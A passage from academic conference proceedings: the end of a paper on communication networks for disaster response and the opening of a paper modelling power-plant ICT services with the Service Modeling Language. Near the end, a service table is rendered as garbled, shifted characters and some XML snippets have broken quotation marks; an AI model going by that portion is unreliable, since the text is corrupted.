engage in multinational cooperation, such as international disaster relief operations, by utilising SDR bridging techniques between common and nation-specific waveforms. Replacing legacy radio platforms with modern SDR-based units, conforming to international standards, gives considerable tactical and operative advantages. The capability to share information is crucial to the effectiveness and success of a cooperative mission [1]. It also makes communication more cost effective, by being able to procure commercial off-the-shelf (COTS) equipment at a significantly lower price than developing own equipment. Since the late 1990s the United States Department of Defense has spent a great deal of time and resources on research and developing the SDR-based Joint Tactical Radio System (JTRS) [35], which is planned as the next-generation voice-and-data radio for use by the U.S. military in field operations after 2010. In Europe, similar techniques are being considered in the EDA joint research project European Secured Software Defined Radio Referential (ESSOR). These emerging information infrastructures will bring new problems and challenges to solve. In the rest of this paper we will look at challenged networks for disaster response, in which the problems of emerging information infrastructures are taken to the extreme.
3 Disaster Response Infrastructures 3.1 Disaster Response Needs It lies in the nature of unforeseen events and disasters that they are impossible to characterise in a uniform way. The needs and resources differ drastically depending on circumstances such as the scale of the event, which part of the world is affected, and the type of event (earthquake, flooding, fire, epidemic, etc). However, two important problems can be identified: – the need for a common operational picture, – and the matching of needs and resources. The military is often one of the key actors in the event of a disaster. The initial group of problems, to establish and manage interim information infrastructures, to distribute information, and to coordinate the relief engagement, is something the armed forces have long experience of dealing with. On the other hand, one of the biggest challenges for the military is to be able to participate in collaborative networked environments, such as hastily formed networks for disaster mitigation, while safeguarding valuable information, and upholding confidentiality, integrity, and non-repudiation properties. Information security in military command and control systems often depends on an outer perimeter, a well-defined security boundary within which classified information may not be distributed [48]. Making changes to this structure, such as interconnecting information systems with collaboration partners in a hastily formed network, requires new models for trust [27] and access control [6] in the mutual conversation space. The rest of this section will target characteristics and challenges of hastily formed communication networks. That is, our focus here is on the technical challenges rather
Emerging Information Infrastructures: Cooperation in Disasters
263
than the organisational. Although it is precarious to generalise, we try to find some common features and problems associated with such systems. We base most of our reasoning on two of the most well-documented disasters in recent history, the tsunami in east Asia and the Katrina hurricane. 3.2 Characteristics The infrastructures that will be needed in the event of an emergency cannot be carefully planned and modelled beforehand. They will emerge spontaneously, and will rapidly change over time. Such systems are not intended to replace current systems for everyday use since they are in many ways suboptimal. Their strength is the fact that they can be deployed when the other communication networks have failed. Hastily Formed Networks (HFN) is a term coined by the Naval Postgraduate School in California, USA [13]. Figure 1 shows a possible scenario where different types of actors need to communicate with each other. These networks are quickly mobilised, organised, and coordinate massive responses. Other characteristics are that they are networks with no common authority but all the same must cooperate and collaborate during a massive as well as distributed response to often a chaotic and completely surprising situation. The networks also have to cope with insufficient resources and lack of infrastructure. Their effectiveness rests on the quality of the conversation spaces established in the beginning. An experience report by Steckler et al [46] from the aftermath of Hurricane Katrina shows that the wireless medium could be very effective when quickly establishing a network. Those networks were still mostly managed in a way similar to wired networks. Creating and using ad hoc networks might have decreased the effort needed to set up and manage. However, this is not a mature technology and there are many challenges which do not exist in wired/cellular networks [50]. For example, there is a lack of global knowledge (decisions need to be taken based on a local view), the wireless medium needs to be shared between nodes that have not agreed beforehand on when and how to communicate, and communication disruptions are much more likely to occur [5].
Fig. 1. Disaster Response Scenario
264
M. Asplund, S. Nadjm-Tehrani, and J. Sigholm
Just as time is an important factor in current information infrastructures (i.e. rapid discovery leads to faster containment and recovery from blackouts), it will be equally important in HFN. These networks will, for example, be used to rapidly disseminate (manycast) information on spread of damage, injuries and threats to lives. However, as opposed to fixed networks where this can be dealt with using redundancy together with some basic level of differentiation, wireless and intermittently connected networks are harder to tackle. 3.3 Challenges We suggest that there are five main technical challenges that make reliable and timely communication difficult in post-disaster communication, summarised in Table 2. Vast amounts of research have been devoted to each of these subjects separately, but not many have tried to deal with them all at once. Unfortunately, all of them will be present in a large crisis situation. Disconnectivity. A consequence of mobile wireless networks with resource constraints are network partitions. It will not be feasible for such a network to keep all nodes connected at all times. Network partitions do not only occur in wireless networks, faulttolerant distributed systems research has dealt with network partitions in such cases for a long time [41]. However, in those works, disconnectivity is considered an exception and usually a rare event. This view on connectivity remained even in research within mobile ad hoc networks since most researchers assume dense networks with random mobility models leading to fairly connected networks. However, recent research emphasises that real-life mobility models, for example in, Kuiper and Nadjm-Tehrani [29], Fiore et al. [17] and Nelson et al. [36], imply that, for some applications, a contemporaneous path between nodes cannot be assumed. Although connectivity is quickly improving with maturity of new technologies, this requires the existence of in-place infrastructure (satellite communication is still expensive and not available to all). To what extent future VANETs will have to rely on a fixed infrastructure is still an open question. An alternative is to devise protocols based on a store-and-forward principle so that mobility is leveraged as a means to disseminate data in the network [45,42]. Resource constraints. Unfortunately, this is not as easy as just storing all data packets that are received, and forwarding them in the hope that the message will reach its destiTable 2. Challenges for disaster response infrastructures Challenge Disconnectivity as a norm
Emerging solutions Store-and-forward techniques, delay-tolerant networks (DTN) Resource constraints Quality-of-service techniques, prioritisation, optimisation Infeasibilty to centrally manage Distributed gossip-style protocols Heterogeneity Overlay networks, DTN bundles Security: less organised opportunistic threats Reputation-based systems, selfish-resistant or adversary disruptions protocols, intrusion detection
Emerging Information Infrastructures: Cooperation in Disasters
265
nation. Due to the scarceness of energy and bandwidth, protocols will need to limit their transmissions and make sure that (1) packets are only disseminated if needed (i.e. have highest utility) and (2) once a packet is transmitted, it indeed has a chance of making thehop (and subsequent hops); otherwise the network resources are wasted to no avail. The problem of resource-aware delay-tolerant protocols has been studied by, for example, Haas and Small [22] and Balasubramanian et al. [4]. The key problem is deciding which packets are worthwhile to forward to neighbouring nodes, and when. Infeasibility to centrally manage. The above approaches to optimising resource usage assume a high degree of knowledge about node movements. In a post-disaster scenario, this is not possible. Even the participants and operational clusters in a rescue operation are not known in advance. After the Katrina storm, the American Red Cross alone organised approximately 250.000 (volunteer) rescue workers [5]. This was a magnitude more than they had ever dealt with previously. Together with the fact that the situation is constantly changing, this means that nobody will have an up-to-date global view of what is going on. Thus, ideally the communication protocols will need to function without knowledge of network topology, node addresses, node movements, traffic demands, etc. Heterogeneity. The fourth challenge is difficult to tackle. It has to do with the fact that in an emergency situation, there will be actors from many different parts of the society such as the police, military, fire fighters, medical personnel, volunteers, etc. These actors need to cooperate with each other but they will probably not have trained together, they will have different technical equipment (ranging from special-purpose hardware such as the Tetra system, to commercial off the shelf non-standardised products). One of the most challenging problems in a disaster scenario is to achieve both technical interoperability and social interoperability amongst the network of networks. A potential approach to achieving technical interoperability is the use of overlays such as delaytolerant networks [16,38]. Moreover, software defined radio facilitates implementing bridging techniques as discussed in Section 2.3. Obtaining social interoperability on top of a given information infrastructure is a multi-disciplinary challenge. Security. Some of the actors may even be adversarial themselves, wanting to disrupt or eavesdrop on communication. This brings us to the security challenge. How to solve the trust issue in a HFN is an open problem. Bad or selfish behaviour can be punished (e.g., by not allowing such nodes to participate in the network) if it is detected. Knowledge about misbehaving nodes can also be shared with others using reputation based systems (e.g., Buchegger and Le Boudec [10]). However, such systems creates new problems with false accusations and identity spoofing. In addition, we need to have distributed intrusion detection as opposed to proposed solutions in existing infrastructures, which are organised with a hierarchy of (wellplaced) detectors and correlation agents. In disaster response scenarios, where at least a subset of rescue workers are trained for this purpose, and given the emerging trend in standardisation of rescue terminology and exchange formats [43], we have a somewhat simpler problem than solving the general anomaly detection problem in Internet based communication. This is a situation that is reminiscent of the SCADA systems anomaly detection – which can benefit from the well-defined communication patterns in normal scenarios.
266
M. Asplund, S. Nadjm-Tehrani, and J. Sigholm
However, a technical challenge is that evaluation of a novel technology means lack of data collected over long time intervals and in realistic scenarios. Detection of attacks on a network is dependent on distinguishing normality from abnormality (for distinguishing unforeseen attack patterns). Also we need to identify the expected traffic patterns and loads on such a network to form a basis for evaluation for novel routing protocols and recovery from node and link crashes. 3.4 Outlook To deal with these challenges we must incorporate results from a variety of areas such as wireless and delay-tolerant networking, fault-tolerant distributed systems, real-time systems, and security. We continue by presenting some of the interdisciplinary work which is being done to do just that; that is, combining techniques from several different areas to provide disaster response infrastructures. We believe that one of the key insights required to provide communication in challenged networks is that disconnectivity is a state that is not abnormal. We already mentioned the area of delay-tolerant networking. This is currently being explored in many different directions, including interplanetary communication [16] and wildlife monitoring [44]. There are many directions for this research that are relevant in a disaster response context. We believe that two of the more urgent ones are: (1) as good as possible characterisations of node mobility and (2) timely and resource efficient dissemination protocols. The Haggle project [9] has shown some interesting results in these directions, although much remains to be done. The RESCUE project [34] is a wide-spanning project involving several areas relating to crisis response. It tackles problems such as heterogeneity (organisational and technical), event extraction, and security. In a recent paper Dilmaghani and Rao [15] paint a similar picture regarding challenges and problems at hand. They also present a communication platform which allows wireless communication between small hand-held devices by routing traffic through wireless mesh network. WORKPAD [11] is an ongoing European project with the aim of providing software and communication infrastructures for disaster management. They envision a two-layer architecture where the backend is composed of a peer-to-peer network, which is accessed by the frontend devices that are connected in a mobile ad-hoc network. The focus of the research in this project is on the backend, where knowledge and relevant data content is managed. Major disasters put a huge stress on medical personnel. Not only is there a rush in patients needing medical treatment, care has to be administered under adverse conditions regarding electricity and information supply. There are many ways the situation can be improved by new technologies. As an example, Gao et al. [19] have demonstrated a system where each patient carries a monitoring system which continuously and wirelessly sends information regarding the patient’s health. This way the medical personnel can monitor many patients simultaneously and react quickly to changes in their condition. Olariu et al. [37] present an architecture for a low-bandwidth wireless telemedicine system which is still able to transfer imaging data to a remote site. From the military domain there is a clear interest in ad hoc technologies in challenged environments. For example, the Swedish Armed Forces project GTRS (Common
Emerging Information Infrastructures: Cooperation in Disasters
267
Tactical Radio System) [3] seeks to benefit from SDR technologies to implement a tactical IP-based ad hoc network, bridging the gap between legacy communication equipment and modern devices using internationally standardised waveforms. The fist demonstrator GTRS units were delivered to the Swedish Armed Forces during 2007, and delivery will continue until January 2014, when the system is scheduled for complete deployment both nationally and within the Nordic Battle Group. The first waveform delivered and tested for the GTRS system was Terrestrial Trunked Radio (Tetra), a mobile radio system designed primarily for emergency services and government use.
4 Summary and Conclusion We have presented some challenges for the infrastructure systems of tomorrow. In particular we have discussed the spontaneous infrastructures that will form in disaster response situations. There are many similarities between existing infrastructures, and disaster response networks: human lives depend on their availability, time is of essence, and there is an incentive for attacking them. However, they are also very different. The disaster response infrastructures will have much less resources and need to be self-configuring and self-healing in order to be useful. On the other hand, the attacks against these networks are also likely to be less sophisticated and smaller in scale. There are also other challenges, which have not existed (at least to the same degree) in traditional infrastructures, such as mobility, disconnectivity, scarceness of resources, and heterogeneity. These issues have been the subject of some attention in the field of mobile ad hoc networks, which is starting to mature, moving away from synthetic scenarios with general but artificial mobility models. Instead, an increasing research is being devoted to the problems which occur in particular application areas, each with their own characteristics. Disaster response networks is an instance of such an application area where this research field can expand and improve. We believe that this emerging field has a lot to gain by looking into the research on protection of critical infrastructures. The reverse is also true, even stationary networks will need to adopt methods of self-adaptation and resilience to cope with the complexity and inherent instability of converging network technologies. Our own work in this area is directed towards finding systematic methods to design and evaluate resource-efficient protocols for disaster response management. Such an effort requires good characterisations of mobility and network connectivity, as well as distributed resource optimisation methods.
References 1. Adams, C.: Information sharing raises more questions than answers. AFCEA Signal Magazine (May 2008) 2. Amin, M.: Toward self-healing energy infrastructure systems. IEEE Comput. Appl. Power 14(1), 20–28 (2001) 3. Baddeley, A.: Sweden seeks military communications flexibility. AFCEA Signal Magazine (May 2006)
268
M. Asplund, S. Nadjm-Tehrani, and J. Sigholm
4. Balasubramanian, A., Levine, B., Venkataramani, A.: DTN routing as a resource allocation problem. SIGCOMM Comput. Commun. Rev. 37(4), 373–384 (2007) 5. Becker, J.C.: The opportunities and limits of technology in non profit disaster response. Keynote speech at the ISCRAM conference, Washington (May 2008) 6. Bengtsson, A., Westerdahl, L.: Access control in a coalition system. Technical Report FOIR–2393–SE, Swedish Defence Research Agency (December 2007) 7. Birman, K.: Technology challenges for virtual overlay networks. IEEE Transactions on Systems, Man and Cybernetics, Part A 31(4), 319–327 (2001) 8. Birman, K., Chen, J., Hopkinson, E., Thomas, R., Thorp, J., Van Renesse, R., Vogels, W.: Overcoming communications challenges in software for monitoring and controlling power systems. Proc. IEEE 93(5), 1028–1041 (2005) 9. Bruno, R., Conti, M., Passarella, A.: Opportunistic networking overlays for ICT services in crisis management. In: Proc. 5th International ISCRAM Conference. ISCRAM (2008) 10. Buchegger, S., Le Boudec, J.: Self-policing mobile ad hoc networks by reputation systems. IEEE Communications Magazine 43(7), 101–107 (2005) 11. Catarci, T., de Leoni, M., Marrella, A., Mecella, M., Salvatore, B., Vetere, G., Dustdar, S., Juszczyk, L., Manzoor, A., Truong, H.-L.: Pervasive software environments for supporting disaster responses. IEEE Internet Comput. 12(1), 26–37 (2008) 12. CRUTIAL. European FP6 project, http://crutial.cesiricerca.it/ 13. Denning, P.J.: Hastily formed networks. Commun. ACM 49(4), 15–20 (2006) 14. DIESIS. European FP7 project, http://www.diesis-project.eu/ 15. Dilmaghani, R., Rao, R.: A wireless mesh infrastructure deployment with application for emergency scenarios. In: Proc. 5th International ISCRAM Conference. ISCRAM (2008) 16. Farrell, S., Cahill, V.: Delay- and Disruption-Tolerant Networking. Artech House, Inc., Norwood (2006) 17. Fiore, M., Harri, J., Filali, F., Bonnet, C.: Vehicular mobility simulation for VANETs. In: Proc. 40th Annual Simulation Symposium (ANSS) (2007) 18. FORWARD. European FP7 project, http://www.ict-forward.eu/ 19. Gao, T., Pesto, C., Selavo, L., Chen, Y., Ko, J., Lim, J., Terzis, A., Watt, A., Jeng, J., Chen, B., Lorincz, K., Welsh, M.: Wireless medical sensor networks in emergency response: Implementation and pilot results. In: Proc. 2008 IEEE International Conference on Technologies for Homeland Security. IEEE, Los Alamitos (2008) 20. Ghorbani, A.A., Bagheri, E.: The state of the art in critical infrastructure protection: a framework for convergence. International Journal of Critical Infrastructures 4, 215–244 (2008) 21. Guimera, R., Amaral, L.: Modeling the world-wide airport network. The European Physical Journal B - Condensed Matter 38, 381–385 (2004) 22. Haas, Z.J., Small, T.: Evaluating the capacity of resource-constrained DTNs. In: Proc. 2006 international conference on Wireless communications and mobile computing (IWCMC). ACM, New York (2006) 23. Helal, A.A., Bhargava, B.K., Heddaya, A.A.: Replication Techniques in Distributed Systems. Kluwer Academic Publishers, Norwell (1996) 24. HIDENETS. European FP6 project, http://www.hidenets.aau.dk/ 25. IRRIIS. European FP6 project, http://www.irriis.org/ 26. Jefferson, T.L.: Using the internet to communicate during a crisis. VINE 36, 139–142 (2006) 27. Kostoulas, D., Aldunate, R., Pena-Mora, F., Lakhera, S.: A nature-inspired decentralized trust model to reduce information unreliability in complex disaster relief operations. Advanced Engineering Informatics 22(1), 45–58 (2008) 28. Kr¨ugel, C., Robertson, W.K.: Alert verification: Determining the success of intrusion attempts. In: Workshop the Detection of Intrusions and Malware and Vulnerability Assessment (DIMVA). German Informatics Society (2004)
Emerging Information Infrastructures: Cooperation in Disasters
269
29. Kuiper, E., Nadjm-Tehrani, S.: Mobility models for uav group reconnaissance applications. In: Proc. International Conference on Wireless and Mobile Communications (ICWMC) (2006) 30. Labovitz, C., Ahuja, A., Jahanian, F.: Experimental study of internet stability and backbone failures. In: Twenty-Ninth Annual International Symposium on Digest of Papers FaultTolerant Computing (1999) 31. Labovitz, C., Wattenhofer, R., Venkatachary, S., Ahuja, A.: Resilience characteristics of the internet backbone routing infrastructure. In: Proc. Third Information Survivability Workshop (2000) 32. Laprie, J., Kanoun, K., Kaniche, M.: Modeling interdependencies between the electricity and information infrastructures. In: Saglietti, F., Oster, N. (eds.) SAFECOMP 2007. LNCS, vol. 4680, pp. 54–67. Springer, Heidelberg (2007) 33. McHugh, J., Christie, A., Allen, J.: Defending yourself: the role of intrusion detection systems. IEEE Softw. 17(5), 42–51 (2000) 34. Mehrotra, S., Butts, C.T., Kalashnikov, D., Venkatasubramanian, N., Rao, R.R., Chockalingam, G., Eguchi, R., Adams, B.J., Huyck, C.: Project RESCUE: challenges in responding to the unexpected. In: Santini, S., Schettini, R. (eds.) Internet Imaging V, vol. 5304, pp. 179– 192. SPIE (2003) 35. Melby, J.: Jtrs and the evolution toward software-defined radio. In: MILCOM 2002, October 2002, pp. 1286–1290 (2002) 36. Nelson, S.C., Albert, I., Harris, F., Kravets, R.: Event-driven, role-based mobility in disaster recovery networks. In: Proc. second workshop on Challenged networks (CHANTS). ACM, New York (2007) 37. Olariu, S., Maly, K., Foutriat, E.C., Yamany, S.M., Luckenbach, T.: A Dependable Architecture for Telemedicine in Support of Diaster Relief. In: Dependable Computing Systems, pp. 349–368. Wiley, Chichester (2005) 38. Plagemann, T., Skjelsvik, K., Puzar, M., Drugan, O., Goebel, V., Munthe-Kaas, E.: Crosslayer overlay synchronization in sparse manets. In: Proc. 5th International ISCRAM Conference (2008) 39. ReSIST. Deliverable D12 resilience-building technologies: State of knowledge, ch. 2 (September 2006), http://www.resist-noe.org/Publications/Deliverables/ D12-StateKnowledge.pdf 40. Rinaldi, S., Peerenboom, J., Kelly, T.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Syst. Mag. 21(6), 11–25 (2001) 41. Saito, Y., Shapiro, M.: Optimistic replication. ACM Comput. Surv. 37(1), 42–81 (2005) 42. Sandulescu, G., Nadjm-Tehrani, S.: Opportunistic dtn routing with windows-aware adaptive replication (2008) (submitted for publication) 43. Shank, N., Sokol, B., Hayes, M., Vetrano, C.: Human services data standards: Current progress and future visions in crisis response. In: Proc. ISCRAM conference (May 2008) 44. Small, T., Haas, Z.J.: The shared wireless infostation model: a new ad hoc networking paradigm (or where there is a whale, there is a way). In: Proc. International Symposium on Mobile Ad Hoc Networking & Computing (MobiHoc). ACM, New York (2003) 45. Spyropoulos, T., Psounis, K., Raghavendra, C.S.: Spray and wait: an efficient routing scheme for intermittently connected mobile networks. In: Proc. SIGCOMM Workshop on Delaytolerant networking (WDTN). ACM, New York (2005) 46. Steckler, B., Bradford, B.L., Urrea, S.: Hastily formed networks for complex humanitarian disasters (September 2005), http://www.hfncenter.org/cms/KatrinaAAR 47. Svendsen, N., Wolthusen, S.: Analysis and statistical properties of critical infrastructure interdependency multiflow models. In: Proc. IEEE SMC Information Assurance and Security Workshop (IAW) (2007)
270
M. Asplund, S. Nadjm-Tehrani, and J. Sigholm
48. Swanson, M., Hash, J., Bowen, P.: Guide for developing security plans for federal information systems. Technical Report 800-18, National Institute of Standards and Technology (February 2006) 49. Szentivanyi, D., Nadjm-Tehrani, S.: Middleware support for fault tolerance. In: Mahmoud, Q. (ed.) Middleware for Communications. John Wiley & Sons, Chichester (2004) 50. Tschudin, C., Gunningberg, P., Lundgren, H., Nordstr¨om, E.: Lessons from experimental MANET research. Ad Hoc Networks 3(2), 221–233 (2005) 51. WOMBAT. European FP7 project, http://www.wombat-project.eu/
Service Modeling Language Applied to Critical Infrastructure Gianmarco Baldini and Igor Nai Fovino Institute for the Protection and the Security of the Citizen, Joint Research Centre, European Commission, via E. Fermi 1, Ispra, 21027, VA, Italy
Abstract. The modeling of dependencies in complex infrastructure systems is still a very difficult task. Many methodologies have been proposed, but a number of challenges still remain, including the definition of the right level of abstraction, the presence of different views on the same critical infrastructure and how to adequately represent the temporal evolution of systems. We propose a modeling methodology where dependencies are described in terms of the service offered by the critical infrastructure and its components. The model provides a clear separation between services and the underlying organizational and technical elements, which may change in time. The model uses the Service Modeling Language proposed by the W3 consortium for describing critical infrastructure in terms of interdependent services nodes including constraints, behavior, information flows, relations, rules and other features. Each service node is characterized by its technological, organizational and process components. The model is then applied to a real case of an ICT system for users authentication. Keywords: Modeling, Critical infrastructures, Service.
1
Introduction
In this paper, we present a modeling approach where critical infrastructures can be described on the basis of services they provide or are dependent upon. This is important to model intradomain and inter-domain dependencies in CIs, because the dependency relationship is mostly based on the exchange of services rather than physical association. The modeling of a system through services has a parallel in service engineering and ICT, where systems are built by creating a services oriented architecture. In that case, the goal is to design a system by composing and orchestrating services implemented by software components and applications. In a similar way, the interaction of services or ‘features’ in telecommunications systems is known as the “feature interaction problem’ (see [4] and [5]). A potential risk, which unpaired previous research approaches in feature interaction, is extreme formalism and the wish to represent all the levels of detail in the system. Eventually the size of the state spaces and complexity becomes unpractical to model a large critical infrastructure. In the service oriented approach, it is possible to choose the level of abstraction by selecting the type of elements of the critical infrastructures and the list of related services. For example, in a ICT infrastructure, we can model only the main communication nodes R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 271–278, 2009. c Springer-Verlag Berlin Heidelberg 2009
272
G. Baldini and I.N. Fovino
(i.e. the Network Management system or Billing system) or we can describe in detail the services offered by each software application (the Routing functionality implemented by a network router). In the latter case, the level of complexity is unpractical and often it is not needed to determine important dependencies. Our model shall be based on the following elements: A representation of the critical infrastructures as a composition of services, assets and dependencies, a modeling language to represent the services and their interactions based on SML and related W3C languages (Xpath, Schematron and others) and implemented in XML. The rest of the paper is organized in the following sections: in section 2, the Service Oriented Approach is described, in section 3 the Service Modeling Language (SML) is described, in section 4 and 5 we apply SML to the representation of the ICT architecture of a Power Plant.
2
Description of the Service Oriented Approach
Every system can be defined as a collection of entities collaborating to realize a set of objectives. Masera and Nai in [6] define the concept of dependency among components and sub-systems (e.g. a system object A depends from a system object B if B is required by A in order to reach its mission) and, the concept of information flow as a set of point-to-point relationships describing the whole life cycle of an information item. Beyond the basic description of components, vulnerabilities, attacks etc., we see the need for a paradigm assisting in the interconnection of the different elements that need to be analyzed. For dealing with this question, we make use of the concept of Service. In this light, objects in a system are producers/consumers of services. Basically the service oriented approach is composed by the following steps: 1) All the service nodes and assets in the critical infrastructure are listed and defined. 2) For each service node and asset all services dependencies are computed and defined using the modeling language described in the following sections. 3) We combine the information from step 1 and 2 to determine the “service chains’ by exploring the service relationships associated to every service (while taking care of possible cyclic dependencies). 4) We identify the end-users of the critical infrastructure, which services they use and what “service chains’ are correlated. In this step, we also define how the same service provided by the critical infrastructure can have different levels of priority for different users (“differentiation’). For example the electric power provided by the energy critical infrastructure to an hospital has an higher priority than a residential area. 5) Using the same modeling language, we can associate the vulnerabilities to the assets and the “service chains’ in the critical infrastructure.
3
The Service Modeling Language
The W3 consortium (W3C) has faced a similar problem in tackling the complexity of large man-made infrastructure. W3C has proposed the creation of a Service modeling language to capture knowledge of complex IT services and systems in
Service Modeling Language Applied to Critical Infrastructure
273
machine-interpretable models. The Service Modeling Language (SML) provides a rich set of constructs for creating models of complex IT services and systems. A model in SML is realized as a set of interrelated XML documents. The XML documents contain information about the parts of system, as well as the constraints that each part must satisfy for the system (or critical infrastructure) to function properly (from [1]). Constraints are captured in two ways: 1. Schemas – these are constraints on the structure and content of the documents in a model. SML uses a profile of XML Schema (see [2]) as the schema language. SML also defines a set of extensions to XML Schema to support inter-document references. 2. Rules – are Boolean expressions that constrain the structure and content of documents in a model. SML uses a profile of Schematron and XPath for rules. SML has been created to design complex IT systems and its services and not specifically to model critical infrastructures. A certain amount of tailoring is needed to apply SML to the Service Oriented Approach for Critical Infrastructures.
4
Description of the Example System to be Modelled
This chapter describes a real-word example of a power plant network and the remote access system. In 1, it is possible to see the high level architecture of a typical Power Plant network. From the networking perspective, it is possible to identify some major subsystems: Power Plant Backbone: it is composed of all the network devices, which allow the different subnet of the Power Plant to communicate. Field Network : is the network interconnecting the sensors, and the actuators, which directly interact with the Power Plant Electro-Mechanic devices. Process Network : this network hosts all the SCADA systems. By using these systems, the Plant Operators manage the whole Power Plant, sending control commands to such sensors in the Field Network and reading Plant Measurements and Parameters.Data exchange Network : this area hosts a set of ’data exchange’ servers, which receive data from the process network and make them available to the operators which work in the Power Plant Intranet. Power Plant Intranet : this is the branch of the Company network (Win Domain based) that provides intranet services to the Power Plant Operators. It is used not only in order to conduct “office work’, but also to keep remotely under control the Power Plant, by accessing, through a VPN authentication, the DMZ and the Process Network of a target Power Plant. Internet : this network is the “rest of the world’. In the architecture, remote operators can connect to the Power Plant, e.g. for maintenance matters, through a so-called RADIUS authentication over a site-to-site VPN network.
5
Application of SML to Describe the Example System
This chapter will describe how to apply SML and related languages to represent the real-case system described in the previous chapter.
274
G. Baldini and I.N. Fovino
Fig. 1. ICT architecture of a Power Plant
The following table provides a brief description of the services needed to implement the remote connection service, a description of the dependencies and the mapping to the related service nodes. The service nodes are RADIUS Server, Network Access Server and WinDomain Server. The following SML definitions must be provided: 1. Definition of simplexType and complexTypes 2. Definition of serviceNode elements 3. Definition of service node instances identified by URI $<xs:complexType name="ServiceType"> $<xs:sequence> $<xs:element name="Name" type="xs:string"/> $<xs:element name="Status" type="xs:StatusType"/> $<xs:element name=‘‘DependentServices=‘‘ minOccurs=‘‘0’ $<xs:complexType> $<xs:sequence> $<xs:element ref=‘‘tns:ServiceRef’maxOccurs=‘‘unbounded’/> $ $ $ $ $ $<xs:complexType name="End-Users"> $<xs:sequence> $<xs:element name="Name" type="xs:string"/> $<xs:element name="Role" type="xs:UserRole"/> $<xs:element name=‘‘UsedServices=‘‘ minOccurs=‘‘0’ $<xs:complexType> $<xs:sequence> $<xs:element ref=‘‘tns:ServiceRef’maxOccurs=‘‘unbounded’/> $ $ $ $ $ $
The energy service can be considered a special type of service with additional attributes. EnergyService Type is then a derived type of ServiceType. This can be described using the Extension of XML schema:
Service Modeling Language Applied to Critical Infrastructure
275
$ $ $<extension base="sml:ServiceType"> $<sequence> $<element name="maxPower" type="xs:integer"/> $<element name="duration" type="xs:integer"/> $ $ $ $
“maxPower’ is the maximum electric power in WATT, which the energy service can provide. “Duration’ is how long (in hours) the service can provide the electric power. For both attributes a value can be defined.
6HUYLFH1DPH
'HVFULSWLRQRI6HUYLFH
'HSHQGVRQ
5HPRWHBSRZHUBSODQWFRQWURO 533&
WKLVLVWKHKLJKOHYHOVHUYLFHXVHGE\WKHUHPRWHXVHUVLQRUGHUWRFRQWUROUHPRWHO\WKH 3RZHU3ODQW
931
WKLVVHUYLFHLVQHHGHGE\WKH533&LQRUGHUWRSURWHFWWKHUHPRWHFRQWUROIORZVIURP HDYHVGURSSHUVDQGIURPPDOLFLRXVDJHQWV
5RXWLQJ6HUYLFH533& 56&69315&5'5&5 QRWFULWLFDO *) /RFDOBFRQQHFWLRQBVHUYLFH 5RXWLQJBVHUYLFH
*DWHZD\B)LOWHULQJBVHUYLFH *)
WKLVVHUYLFHLVQRWQHFHVVDU\UHTXLUHGE\WKH533&VHUYLFHDQGE\WKH931VHUYLFH +RZHYHUD*)GLVVHUYLFHFRXOGFDXVHPDMRUGLVVHUYLFHVWRWKH931DQGWKH533& VXFKKLJKOHYHOVHUYLFHWDNHVWKHUHTXHVWIURPWKH5&5VHUYLFHEXLOGVXSWKHUHTXHVW 5DGLXVBFOLHQWBUHTXHVWBGHOLYHU SDFNHWDQGGHOLYHULWWRWKH5DGLXVBVHUYHUBUHFHLYHUVHUYLFH,WVIDLOXUHFRPSURPLVHV \5&5' FRPSOHWHO\WKH533&VHUYLFH 5&(5DGLXVBFOLHQWBGHOLYHU\ 6XFKDVHUYLFHSURYLGHGE\WKHUDGLXVFOLHQWFRQVWLWXWHVWKHILUVWVWHSRIWKHUDGLXV 5DGLXVBFOLHQWBUHFHSWLRQ DXWKHQWLFDWLRQVFKHPDSUHVHQWHGLQWKHSUHYLRXVVHFWLRQ,WVIDLOXUHFRPSURPLVHV 5&5 FRPSOHWHO\WKH533&VHUYLFH LWDOORZVWRHQFU\SWWKHGDWDUHFHLYHGIURPWKHUHPRWHFOLHQWVXVLQJWKHSXEOLFNH\VRID 5DGLXVBFOLHQWBHQFU\SWLRQ WDUJHWUDGLXVVHUYHU,WLVQHHGHGE\WKH5&5'VHUYLFH,WVIDLOXUHFRPSURPLVH 5&( FRPSOHWHO\WKH5&5' LWWDNHVWKHSURSHUO\IRUJHGUHTXHVWSDFNHWIURPWKH5&(VHUYLFHDQGGHOLYHULWWRWKH 5DGLXVVHUYHUE\XVLQJORZOHYHOVHUYLFHVDVWKH/RFDOBFRQQHFWLRQB6HUYLFHDQGWKH 5DGLXVBFOLHQWBGHOLYHU\ '16VHUYLFH,WVIDLOXUHFRPSURPLVHGLUHFO\WKH5&5'VHUYLFH 5DGLXVBVHUYHUBUHTXHVWBUHFHS LWUHFHLYHVWKHUHTXHVWVIURPWKHUDGLXVFOLHQW$GLVVHUYLFHKHUHFRXOGGRZQJUDGHRU WLRQ5V55 FRPSOHWHO\IDLOWKHDXWKHQWLFDWLRQSURFHVVDQGWKHQWKH533&
1HWZRUN$FFHVV6HUYHU
1HWZRUN$FFHVV6HUYHU
1HWZRUN$FFHVV6HUYHU
1HWZRUN$FFHVV6HUYHU
1HWZRUN$FFHVV6HUYHU
1HWZRUN$FFHVV6HUYHU
1HWZRUN$FFHVV6HUYHU
5DGLXV6HUYHU
